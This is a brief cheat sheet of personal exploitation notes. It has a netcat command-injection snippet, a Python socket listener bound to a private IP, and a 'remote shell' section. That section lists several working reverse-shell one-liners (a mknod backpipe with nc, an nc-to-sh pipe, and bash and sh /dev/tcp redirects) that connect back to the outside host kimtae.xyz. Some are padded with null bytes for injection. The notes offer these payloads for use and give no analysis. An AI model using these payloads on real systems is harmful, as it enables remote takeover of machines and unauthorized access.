
__shell command injection__
nc -l 12345 <&1 | ./exe > &0
cmd 1>&2
cmd 2>&1
__


__receive thread__
def receiver() :
    ss = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ss.bind( ( '10.211.55.19' , 9998) )
    ss.listen(1)
    while(True) :
        conn, addr = ss.accept()
        print conn.recv(1024)
        conn.close()
#threading.Thread(target=receiver).start()
__


__remote shell__
nc -lvvp 9989 wait
cmd = "mknod backpipe p; nc kimtae.xyz 9989 0<backpipe | /bin/bash 1>backpipe\x00"
cmd = 'nc kimtae.xyz 8888 | /bin/sh | nc kimtae.xyz 9989\x00'
cmd = "bash -c 'bash>&/dev/tcp/kimtae.xyz/9989 0>&1'\x00"
cmd = "/bin/sh -i >& /dev/tcp/kimtae.xyz/9989 0>&1;"
9990
__


